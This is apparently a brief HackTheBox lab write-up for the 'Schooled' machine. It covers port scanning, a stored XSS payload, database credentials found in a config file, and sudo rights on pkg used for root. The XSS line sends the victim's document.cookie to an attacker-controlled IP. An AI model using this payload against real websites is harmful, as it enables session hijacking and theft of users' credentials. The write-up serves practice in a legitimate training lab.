HackTheBox Writeup — Schooled

Port Scan / Enumeration

nmap -sC -sV -p- -Pn --min-rate=10000 -oN nmap 10.10.10.234
  • Port 80 -> HTTP (Web)
  • Port 33060 -> MySQL (Database)

Way to Web User

Since there is a web server being hosted on the machine, I added the schooled.htb domain in my hosts file and checked the domain on the browser

<script>var i=new Image;i.src=”http://10.10.14.8/?"+document.cookie;</script>

Way to User

Enumerating the webroot, I found a config file which contained database credentials

Way to Root

Running the sudo -l command, I found that the current user can run sudo with no password on the /usr/sbin/pkg along with update or installation of any package

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store